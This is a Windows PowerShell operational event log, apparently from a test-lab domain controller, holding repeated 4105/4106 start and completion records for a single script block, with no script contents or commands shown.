SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474785
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474784
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474783
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474782
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474781
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474780
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474779
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474778
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474777
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474776
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474775
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474774
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474773
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474772
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474771
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474770
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474769
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474768
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474767
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474766
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474765
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474764
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474763
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474762
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474761
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474760
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474759
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474758
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474757
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474756
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474755
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474754
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474753
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474752
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474751
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474750
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474749
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474748
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474747
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474746
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474745
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474744
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474743
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474742
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474741
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474740
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474739
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474738
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474737
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474736
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474735
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474734
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474733
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474732
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474731
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
